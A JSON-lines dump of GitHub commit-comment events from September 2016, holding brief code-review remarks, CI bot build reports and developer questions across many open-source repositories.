{"id":"4571169986","type":"CommitCommentEvent","actor":{"login":"joshtriplett"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19045779,"position":94,"line":164,"path":"src/ops/mod.rs","commit_id":"a9357a8bdd285eea75c9b54853f5df0aa359401c","created_at":"2016-09-15T22:35:03Z","updated_at":"2016-09-15T22:35:03Z","body":"I'd suggest using `\\u{2580}` rather than inlining the unicode character."}},"created_at":"2016-09-15T22:35:03Z"}
{"id":"4571170453","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045783,"position":15,"line":15,"path":"server/db/index.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:35:10Z","updated_at":"2016-09-15T22:35:10Z","body":"In addition, not instead."}},"created_at":"2016-09-15T22:35:10Z"}
{"id":"4571172881","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19045789,"position":null,"line":null,"path":null,"commit_id":"df8ee2991df3230db57a9af7df2dc63daf2132d1","created_at":"2016-09-15T22:35:46Z","updated_at":"2016-09-15T22:35:46Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/477/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T22:35:46Z"}
{"id":"4571176279","type":"CommitCommentEvent","actor":{"login":"mbjorkegren"},"repo":{"name":"virgile-dev/polisClientParticipation"},"payload":{"comment":{"id":19045799,"position":null,"line":null,"path":null,"commit_id":"161178947d327b9f979e8c50e28df2f40c798fba","created_at":"2016-09-15T22:36:39Z","updated_at":"2016-09-15T22:36:39Z","body":"Hey, thanks for doing these!\r\nOne thing is that the first three strings should ideally be really short, since they go on the primary buttons which can be fairly small on mobile.\r\nThat's these three:`s.agree s.disagree and s.pass`"}},"created_at":"2016-09-15T22:36:39Z"}
{"id":"4571178648","type":"CommitCommentEvent","actor":{"login":"tamarrow"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045805,"position":29,"line":52,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:37:12Z","updated_at":"2016-09-15T22:37:12Z","body":":( "}},"created_at":"2016-09-15T22:37:12Z"}
{"id":"4571178913","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19045806,"position":null,"line":null,"path":null,"commit_id":"a0c7fb5f7aa1c7d9028f61fac2129344a2d51734","created_at":"2016-09-15T22:37:16Z","updated_at":"2016-09-15T22:37:16Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-riak_core/builds/2086\n"}},"created_at":"2016-09-15T22:37:16Z"}
{"id":"4571181101","type":"CommitCommentEvent","actor":{"login":"soumak77"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19045810,"position":6,"line":24,"path":"brunch-config.js","commit_id":"fc040a22d5d9330437999eea55c4e34188072610","created_at":"2016-09-15T22:37:47Z","updated_at":"2016-09-15T22:37:47Z","body":"@franbenz I misunderstood the brunch configuration setting.  Looks like the regex just needs to be updated to exclude the file versus matching against it."}},"created_at":"2016-09-15T22:37:47Z"}
{"id":"4571181382","type":"CommitCommentEvent","actor":{"login":"salahatwa"},"repo":{"name":"salahatwa/Data-Flow-Diagram"},"payload":{"comment":{"id":19045812,"position":null,"line":null,"path":null,"commit_id":"f59babf95068f2cb85988ef2e5ee0d8a944bf147","created_at":"2016-09-15T22:37:51Z","updated_at":"2016-09-15T22:37:51Z","body":"**# Draw graph from user input (User input number of entities and number of process and choose relation Between Them) , implemented with pure java .**\r\n\r\n# **Requirements :**\r\n- java jdk .\r\n- ide .\r\n- clone project from githup.\r\n\r\n# **Data Flow Diagram Consist of four levels**  \r\n- Contextual level .\r\n- Level 1 .\r\n- Level 2 .\r\n- User Graph Level .\r\n\r\n# **The following steps show how to draw graph from user input :** \r\n1. User enter number of entities and name of them .\r\n2. in the first level user can draw only one process and its name in contextual level .\r\n3. user enter input that represent input Arrow and output that represent output Arrow .\r\n4. user select relations between inputs and outputs process and entities .\r\n5. user select level to draw and program draw your graph automatically ."}},"created_at":"2016-09-15T22:37:51Z"}
{"id":"4571181693","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"SpencerTranter/uRLShortener"},"payload":{"comment":{"id":19045815,"position":29,"line":93,"path":"index.js","commit_id":"84da6d0f668593bfa5f85a3ea4d4cd1cdedb34d9","created_at":"2016-09-15T22:37:55Z","updated_at":"2016-09-15T22:37:55Z","body":"Too many! :)"}},"created_at":"2016-09-15T22:37:55Z"}
{"id":"4571183769","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19045821,"position":null,"line":null,"path":null,"commit_id":"ad50b2e5df609bb7bb62792e0adefbda3779753c","created_at":"2016-09-15T22:38:25Z","updated_at":"2016-09-15T22:38:25Z","body":"Why not test with (0, 4)?"}},"created_at":"2016-09-15T22:38:25Z"}
{"id":"4571183994","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19045822,"position":94,"line":164,"path":"src/ops/mod.rs","commit_id":"a9357a8bdd285eea75c9b54853f5df0aa359401c","created_at":"2016-09-15T22:38:29Z","updated_at":"2016-09-15T22:38:29Z","body":"Fixed"}},"created_at":"2016-09-15T22:38:29Z"}
{"id":"4571185773","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"SpencerTranter/uRLShortener"},"payload":{"comment":{"id":19045824,"position":1,"line":1,"path":"npm-debug.log","commit_id":"05002d284b8e71148020a46d5152b0454d156194","created_at":"2016-09-15T22:38:56Z","updated_at":"2016-09-15T22:38:56Z","body":"Please add this file to .gitignore"}},"created_at":"2016-09-15T22:38:56Z"}
{"id":"4571188196","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19045828,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-15T22:39:33Z","updated_at":"2016-09-15T22:39:33Z","body":"I don't know, honestly. We'll just have to test."}},"created_at":"2016-09-15T22:39:33Z"}
{"id":"4571190336","type":"CommitCommentEvent","actor":{"login":"monicao"},"repo":{"name":"SpencerTranter/uRLShortener"},"payload":{"comment":{"id":19045834,"position":20,"line":6,"path":"views/urls_index.ejs","commit_id":"36a1264c3d2d466a8ba5cf7bb1b4d4df461cf44c","created_at":"2016-09-15T22:40:04Z","updated_at":"2016-09-15T22:40:04Z","body":"👍 "}},"created_at":"2016-09-15T22:40:04Z"}
{"id":"4571192604","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19045842,"position":null,"line":null,"path":null,"commit_id":"ad50b2e5df609bb7bb62792e0adefbda3779753c","created_at":"2016-09-15T22:40:38Z","updated_at":"2016-09-15T22:40:38Z","body":"Sorry, I submit again now!\n-- \nInviato dal mio dispositivo Android con K-9 Mail. Perdonate la brevità."}},"created_at":"2016-09-15T22:40:38Z"}
{"id":"4571194334","type":"CommitCommentEvent","actor":{"login":"vzhz"},"repo":{"name":"vzhz/MathProgram"},"payload":{"comment":{"id":19045845,"position":null,"line":null,"path":null,"commit_id":"810b7e26d916856c4adee4cef500c254570d5064","created_at":"2016-09-15T22:41:04Z","updated_at":"2016-09-15T22:41:04Z","body":"I later learned that you don't have to end your Python file in .py.  If you want to give your users the ease of not having to type the extension each time, you can use a [\"shebang\"](https://en.wikipedia.org/wiki/Shebang_(Unix)).  I wish I had made up that name...."}},"created_at":"2016-09-15T22:41:04Z"}
{"id":"4571195575","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045848,"position":null,"line":null,"path":null,"commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:41:22Z","updated_at":"2016-09-15T22:41:22Z","body":"CI?"}},"created_at":"2016-09-15T22:41:22Z"}
{"id":"4571197163","type":"CommitCommentEvent","actor":{"login":"pvint"},"repo":{"name":"hydrogen-music/hydrogen"},"payload":{"comment":{"id":19045851,"position":null,"line":null,"path":null,"commit_id":"6259a9e9d95f570366c1c27da101fa8697e878f1","created_at":"2016-09-15T22:41:44Z","updated_at":"2016-09-15T22:41:44Z","body":"Just tested again with a clean build, and same thing.\r\n\r\nJust compared some files with and without the above change, and the glaring difference I see is that without the above change I get:\r\n\r\n`CXX_INCLUDES = -I/usr/local/src/h2tmp/hydrogen/src/core/include -I/usr/local/src/h2tmp/hydrogen/include -I/usr/local/src/h2tmp/hydrogen/build/src/core/include -I/usr/include/qt4/QtDesigner -I/usr/include/qt4/QtDeclarative -I/usr/include/qt4/QtScriptTools -I/usr/include/qt4/QtDBus -I/usr/include/qt4/QtXml -I/usr/include/qt4/QtSql -I/usr/include/qt4/QtOpenGL -I/usr/include/qt4/QtMultimedia -I/usr/include/qt4/QtNetwork -I/usr/include/qt4/QtXmlPatterns -I/usr/include/qt4/QtWebKit -I/usr/include/qt4/QtUiTools -I/usr/include/qt4/QtTest -I/usr/include/qt4/QtScript -I/usr/include/qt4/QtSvg -I/usr/include/qt4/Qt3Support -I/usr/include/qt4/QtGui -I/usr/include/qt4/QtCore -I/usr/share/qt4/mkspecs/default -I/usr/include/qt4 -I/usr/include/raptor2`\r\n\r\nWith the above change I do not get the `-l/usr/include/raptor2`\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-15T22:41:44Z"}
{"id":"4571200673","type":"CommitCommentEvent","actor":{"login":"henri-hulski"},"repo":{"name":"morepath/morepath"},"payload":{"comment":{"id":19045854,"position":null,"line":null,"path":null,"commit_id":"bc8f878ce1360f4bd29370defaac2fb26c7aa160","created_at":"2016-09-15T22:42:38Z","updated_at":"2016-09-15T22:42:38Z","body":"@faassen\r\nNot sure for what you need this.\r\n[docs] is also included in develop_requirements.txt.\r\nOr do you need only sphinx?"}},"created_at":"2016-09-15T22:42:38Z"}
{"id":"4571208881","type":"CommitCommentEvent","actor":{"login":"davidben"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":19045876,"position":null,"line":null,"path":null,"commit_id":"3c0c68ae460e947aaae5702bda6258fb812e1029","created_at":"2016-09-15T22:44:39Z","updated_at":"2016-09-15T22:44:39Z","body":"For BoringSSL, we just have a limit on consecutive warning alerts, like the empty record limit. Perhaps something like that would work for you?\r\n\r\n(Another edge case is the unrecognized_name alert that some servers send on SNI miss.)"}},"created_at":"2016-09-15T22:44:39Z"}
{"id":"4571209133","type":"CommitCommentEvent","actor":{"login":"jake"},"repo":{"name":"totallyviable/ok-dracula"},"payload":{"comment":{"id":19045877,"position":null,"line":null,"path":null,"commit_id":"21633d049bb317e5f99bf8d0f6589492e239cbb9","created_at":"2016-09-15T22:44:44Z","updated_at":"2016-09-15T22:44:44Z","body":"*walk right is totally broken also*"}},"created_at":"2016-09-15T22:44:44Z"}
{"id":"4571215866","type":"CommitCommentEvent","actor":{"login":"fbiville"},"repo":{"name":"neo4j-contrib/neo4j-jdbc"},"payload":{"comment":{"id":19045898,"position":null,"line":null,"path":null,"commit_id":"d2b4ccd8fab8255dd86b9db301acd0c2a02ade50","created_at":"2016-09-15T22:46:26Z","updated_at":"2016-09-15T22:46:26Z","body":"my 2 cents: that deserves a PR against the Java driver to encapsulate this behavior.\r\nAsXxx if Xxx is a primitive type should be default-value-aware, that does not seem like something the JDBC driver should concern itself with."}},"created_at":"2016-09-15T22:46:26Z"}
{"id":"4571225056","type":"CommitCommentEvent","actor":{"login":"asterite"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":19045914,"position":null,"line":null,"path":null,"commit_id":"611849c8bbb01d94d7b668675f5a916a9a75bcaf","created_at":"2016-09-15T22:48:46Z","updated_at":"2016-09-15T22:48:46Z","body":"/cc @waj 😄 "}},"created_at":"2016-09-15T22:48:46Z"}
{"id":"4571226527","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19045922,"position":null,"line":null,"path":null,"commit_id":"a0c7fb5f7aa1c7d9028f61fac2129344a2d51734","created_at":"2016-09-15T22:49:09Z","updated_at":"2016-09-15T22:49:09Z","body":"fast-forwarding develop-2.2 to borshop-integration-859-fd-elevedb-bump = 1db95400"}},"created_at":"2016-09-15T22:49:09Z"}
{"id":"4571233153","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"KairusDarkSeeker/SkinStealer"},"payload":{"comment":{"id":19045943,"position":null,"line":null,"path":null,"commit_id":"ad979b4c323a80098598e48a3ff903d9ace22f56","created_at":"2016-09-15T22:50:52Z","updated_at":"2016-09-15T22:50:52Z","body":"I wonder if your plugin is able to change the skin on the client side of the command user, too.\r\nCan it do that? Or do you know how?"}},"created_at":"2016-09-15T22:50:52Z"}
{"id":"4571241966","type":"CommitCommentEvent","actor":{"login":"marineam"},"repo":{"name":"dm0-/libnetwork"},"payload":{"comment":{"id":19045964,"position":43,"line":911,"path":"drivers/bridge/bridge.go","commit_id":"b394da1e8fb3205e1acd636afcf71741d4e96e73","created_at":"2016-09-15T22:53:09Z","updated_at":"2016-09-15T22:53:09Z","body":"To shrink the deep nesting this could be moved up as its own little function:\r\n\r\n```go\r\n    allRunning := func() {\r\n        for _, ifaceState := range ifaceStates {\r\n            if !ifaceState {\r\n                return false\r\n            }\r\n        }\r\n        return true\r\n    }\r\n\r\n....\r\n\r\n\r\n\r\n    if allRunning() {\r\n        return nil\r\n    }\r\n```"}},"created_at":"2016-09-15T22:53:09Z"}
{"id":"4571245126","type":"CommitCommentEvent","actor":{"login":"AloisMahdal"},"repo":{"name":"upgrades-migrations/preupgrade-assistant"},"payload":{"comment":{"id":19045976,"position":39,"line":822,"path":"preup/script_api.py","commit_id":"c0b5684a60e1620b356b13cf2315aa60601a72c2","created_at":"2016-09-15T22:53:58Z","updated_at":"2016-09-15T22:53:58Z","body":"Oops, I see now, `Error` is not a valid symbol.  Sorry, my bad :-)\r\n\r\nAnyway, what I really meant was `Exception`; it was my intention to catch *any* kind of exception."}},"created_at":"2016-09-15T22:53:58Z"}
{"id":"4571245431","type":"CommitCommentEvent","actor":{"login":"AngelFQC"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19045978,"position":204,"line":198,"path":"app/Migrations/Schema/V111/Version20160907140300.php","commit_id":"3f8f859f71ea836449d4e225495d016f283d2634","created_at":"2016-09-15T22:54:03Z","updated_at":"2016-09-15T22:54:03Z","body":"There are fields defined like NOT null. Then when I try to set (manually) to NULL the field values, thrown an error.\r\nBut, when I execute the other mode, then the datetime values were set to 0000-00-00 00:00:00"}},"created_at":"2016-09-15T22:54:03Z"}
{"id":"4571245889","type":"CommitCommentEvent","actor":{"login":"kristraeger"},"repo":{"name":"kristraeger/client-nodejs"},"payload":{"comment":{"id":19045982,"position":null,"line":null,"path":null,"commit_id":"520c56ef5c4da97fff2b8c931d752f2fa0d72d3f","created_at":"2016-09-15T22:54:11Z","updated_at":"2016-09-15T22:54:11Z","body":"Hey @martintajur! Thank you for posting this live example. I'm trying to make it work locally, i'm getting \r\n\r\n> TypeError: Pipedrive.Client is not a function\r\n\r\nI checked npm pipedrive -v, i'm on 2.14.12 -- any ideas? :( trying to listen to newly added deals to our pipeline and fetch data to send sms notifications... any help highly appreciated!!"}},"created_at":"2016-09-15T22:54:11Z"}
{"id":"4571249051","type":"CommitCommentEvent","actor":{"login":"webOS101"},"repo":{"name":"NewSpring/react-storybook-addon-backgrounds"},"payload":{"comment":{"id":19045988,"position":null,"line":null,"path":null,"commit_id":"f54c28829d5a26e815efae62b01892ca3f9c1b2d","created_at":"2016-09-15T22:55:01Z","updated_at":"2016-09-15T22:55:01Z","body":"Hi!  Curious why you used `assign()` in here.  The PR seems related to linter warnings, wondering which rule this tripped.  I haven't seen this pattern before and am curious if I'm missing something."}},"created_at":"2016-09-15T22:55:01Z"}
{"id":"4571250598","type":"CommitCommentEvent","actor":{"login":"knowuh"},"repo":{"name":"Evan2210/2016-SWC"},"payload":{"comment":{"id":19045992,"position":null,"line":null,"path":null,"commit_id":"1af45f61a3f30143b70a1b59c8b5da4cd4456081","created_at":"2016-09-15T22:55:27Z","updated_at":"2016-09-15T22:55:27Z","body":"Hi!  This file name should be \"index.html\"  not index.html.txt"}},"created_at":"2016-09-15T22:55:27Z"}
{"id":"4571251239","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19045993,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-15T22:55:38Z","updated_at":"2016-09-15T22:55:38Z","body":"![dsc05843](https://cloud.githubusercontent.com/assets/22102135/18570189/97378abc-7b6d-11e6-9d86-57277712e2b4.JPG)\r\n"}},"created_at":"2016-09-15T22:55:38Z"}
{"id":"4571253920","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19045997,"position":null,"line":null,"path":null,"commit_id":"a3b02a4a699393667f59957fbf9e50f6184d0afc","created_at":"2016-09-15T22:56:20Z","updated_at":"2016-09-15T22:56:20Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/478/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T22:56:20Z"}
{"id":"4571255017","type":"CommitCommentEvent","actor":{"login":"Lavoaster"},"repo":{"name":"Poniverse/Poniverse.net"},"payload":{"comment":{"id":19045999,"position":null,"line":null,"path":null,"commit_id":"8d05b53e7a22d7b41cc7bf468653e9aa097efaba","created_at":"2016-09-15T22:56:37Z","updated_at":"2016-09-15T22:56:37Z","body":"@CodesignDev Told me I couldn't swear in Commits."}},"created_at":"2016-09-15T22:56:37Z"}
{"id":"4571257941","type":"CommitCommentEvent","actor":{"login":"LGBTbot"},"repo":{"name":"aanand/geocities-forever-html"},"payload":{"comment":{"id":19046007,"position":null,"line":null,"path":null,"commit_id":"4752cfd321e273baee79efbba1bf2b3c991083bb","created_at":"2016-09-15T22:57:26Z","updated_at":"2016-09-15T22:57:26Z","body":"Is this the. Make a page  scrip for giocitys ?  not seeing  info about the project  Thank you. "}},"created_at":"2016-09-15T22:57:26Z"}
{"id":"4571262859","type":"CommitCommentEvent","actor":{"login":"navsreks"},"repo":{"name":"navsreks/DLN-Validation"},"payload":{"comment":{"id":19046019,"position":null,"line":null,"path":null,"commit_id":"b6a5a37b49d328b8842f6a393cc2437b5cb9272d","created_at":"2016-09-15T22:58:41Z","updated_at":"2016-09-15T22:58:41Z","body":"@sricharan123 this is the updated code"}},"created_at":"2016-09-15T22:58:41Z"}
{"id":"4571263169","type":"CommitCommentEvent","actor":{"login":"PERA88050403"},"repo":{"name":"antoinepaul/antoinepaul"},"payload":{"comment":{"id":19046020,"position":null,"line":null,"path":null,"commit_id":"403bf2203e41faba7c930f75a44f6be7cb943ed2","created_at":"2016-09-15T22:58:45Z","updated_at":"2016-09-15T22:58:45Z","body":"Voici la photo de la lecçon\r\n![dsc06988](https://cloud.githubusercontent.com/assets/22102135/18570259/0678ea38-7b6e-11e6-98fc-dcaf4b6f7e15.JPG)\r\n"}},"created_at":"2016-09-15T22:58:45Z"}
{"id":"4571264434","type":"CommitCommentEvent","actor":{"login":"susanev"},"repo":{"name":"susanev/gazebo"},"payload":{"comment":{"id":19046025,"position":null,"line":null,"path":null,"commit_id":"051fc5190d40daa3eaa46a8e0c885d665e5b6f6f","created_at":"2016-09-15T22:59:04Z","updated_at":"2016-09-15T22:59:04Z","body":"fixes #6"}},"created_at":"2016-09-15T22:59:04Z"}
{"id":"4571266102","type":"CommitCommentEvent","actor":{"login":"marineam"},"repo":{"name":"dm0-/libnetwork"},"payload":{"comment":{"id":19046027,"position":58,"line":926,"path":"drivers/bridge/bridge.go","commit_id":"b394da1e8fb3205e1acd636afcf71741d4e96e73","created_at":"2016-09-15T22:59:31Z","updated_at":"2016-09-15T22:59:31Z","body":"Perhaps `fmt.Errorf(\"timeout after %s waiting for network interfaces %v\", timeout, ifaceNames)`"}},"created_at":"2016-09-15T22:59:31Z"}
{"id":"4571269648","type":"CommitCommentEvent","actor":{"login":"crazile"},"repo":{"name":"crazile/postcss-functions"},"payload":{"comment":{"id":19046040,"position":10,"line":13,"path":"index.js","commit_id":"5d876cc997b67e0346fd11e7045031182cbc27b6","created_at":"2016-09-15T23:00:25Z","updated_at":"2016-09-15T23:00:25Z","body":"It's not so much whether native promises are available but trying to correctly handling code which uses third party promise libraries like the popular [Bluebird](http://bluebirdjs.com/docs/why-bluebird.html) library where `instanceof Promise` may not work.\r\n\r\nSee here: http://stackoverflow.com/questions/27746304/how-do-i-tell-if-an-object-is-a-promise"}},"created_at":"2016-09-15T23:00:25Z"}
{"id":"4571280839","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"Velro/timelapse"},"payload":{"comment":{"id":19046071,"position":null,"line":null,"path":null,"commit_id":"f4ab3a05855dd09c983d5f3b15abd99f02c8aed0","created_at":"2016-09-15T23:03:12Z","updated_at":"2016-09-15T23:03:12Z","body":"James, where are you at with this? We are missing the deadline even after I moved it a bit further."}},"created_at":"2016-09-15T23:03:12Z"}
{"id":"4571281599","type":"CommitCommentEvent","actor":{"login":"AirwavesMan"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19046073,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-15T23:03:23Z","updated_at":"2016-09-15T23:03:23Z","body":"This is not fully fixed at the moment. When you log off prone you will swimming after login again. Ive tested it on the taviana map."}},"created_at":"2016-09-15T23:03:23Z"}
{"id":"4571282029","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19046074,"position":null,"line":null,"path":null,"commit_id":"f4918e30f32134eeb8dc808866fce23ed0a20db6","created_at":"2016-09-15T23:03:31Z","updated_at":"2016-09-15T23:03:31Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/479/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T23:03:31Z"}
{"id":"4571282295","type":"CommitCommentEvent","actor":{"login":"nir-lavee"},"repo":{"name":"France-ioi/bebras-modules"},"payload":{"comment":{"id":19046075,"position":null,"line":null,"path":null,"commit_id":"8dc7e2251e1e5289ed8e4565f8e3dc39a3c9274c","created_at":"2016-09-15T23:03:35Z","updated_at":"2016-09-15T23:03:35Z","body":"Hi,\r\n\r\nDestroying the temporary instance seems simpler. Please take a look at 1aafe38 and let me know if it's the desired behavior.\r\n\r\nThanks\r\nNir"}},"created_at":"2016-09-15T23:03:35Z"}
{"id":"4571283081","type":"CommitCommentEvent","actor":{"login":"Drumstickzs"},"repo":{"name":"Drumstickzs/Dox"},"payload":{"comment":{"id":19046077,"position":2,"line":2,"path":"README.md","commit_id":"bdd4036882ec7771f58a69cf66fd09a48065686d","created_at":"2016-09-15T23:03:47Z","updated_at":"2016-09-15T23:03:47Z","body":"dsfasdf"}},"created_at":"2016-09-15T23:03:47Z"}
{"id":"4571283364","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19046078,"position":null,"line":null,"path":null,"commit_id":"20affced88e2a2beadc7fccf3aa2fa5159a84ed3","created_at":"2016-09-15T23:03:51Z","updated_at":"2016-09-15T23:03:51Z","body":"Related to: backdrop/backdrop-issues#2086 "}},"created_at":"2016-09-15T23:03:51Z"}
{"id":"4571287259","type":"CommitCommentEvent","actor":{"login":"rjmccall"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":19046088,"position":null,"line":null,"path":null,"commit_id":"34fb15e3754df8d8e6f0d8cfcfda81ae5f86e324","created_at":"2016-09-15T23:04:49Z","updated_at":"2016-09-15T23:04:49Z","body":"Why would this affect overloading on the kind of optional anyway?  Overload resolution doesn't care about lowered SIL types."}},"created_at":"2016-09-15T23:04:49Z"}
{"id":"4571289501","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19046093,"position":null,"line":null,"path":null,"commit_id":"e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff","created_at":"2016-09-15T23:05:30Z","updated_at":"2016-09-15T23:05:30Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1762 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e3d19a4cbe7168593a0462ea0d81ecf6e10ec8ff-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-15T23:05:30Z"}
{"id":"4571292382","type":"CommitCommentEvent","actor":{"login":"jalynda"},"repo":{"name":"WyGISC/wilderness_society"},"payload":{"comment":{"id":19046098,"position":null,"line":null,"path":null,"commit_id":"2b22fea3bf33271451a17579e0cedef3758c4858","created_at":"2016-09-15T23:06:17Z","updated_at":"2016-09-15T23:06:17Z","body":"Sage Grouse is in."}},"created_at":"2016-09-15T23:06:17Z"}
{"id":"4571297057","type":"CommitCommentEvent","actor":{"login":"l3kn"},"repo":{"name":"egonSchiele/grokking_algorithms"},"payload":{"comment":{"id":19046112,"position":1,"line":1,"path":"04_quicksort/ruby/05_quicksort.rb","commit_id":"33d432bdaf421d78af2bb688ad7bb62219e6c5ad","created_at":"2016-09-15T23:07:19Z","updated_at":"2016-09-15T23:07:19Z","body":"I ran a quick benchmark\r\n(qs1 is my implementation, qs2 is yours)\r\nand the runtime seems to be roughly the same.\r\n\r\n```\r\n            qs1_1000      6.741M (±20.3%) i/s -     30.535M in   4.790657s\r\n            qs2_1000      6.766M (± 1.4%) i/s -     33.836M in   5.001867s\r\n           qs1_10000     37.793  (± 5.3%) i/s -    189.000  in   5.013274s\r\n           qs2_10000     22.686  (± 0.0%) i/s -    114.000  in   5.026516s\r\n          qs1_100000      3.044  (± 0.0%) i/s -     16.000  in   5.256560s\r\n          qs2_100000      1.948  (± 0.0%) i/s -     10.000  in   5.137859s\r\n```\r\n\r\nPerhaps I have overlooked something,\r\nwhy do you think this implementation\r\nwould have a runtime of O(n^2)?"}},"created_at":"2016-09-15T23:07:19Z"}
{"id":"4571302511","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19046129,"position":null,"line":null,"path":null,"commit_id":"1baf20928e190562630492000c923a3ac0217c9d","created_at":"2016-09-15T23:08:43Z","updated_at":"2016-09-15T23:08:43Z","body":"FixAgainCentroidForNonConvex (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1191 of 1191 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-15T23:08:43Z"}
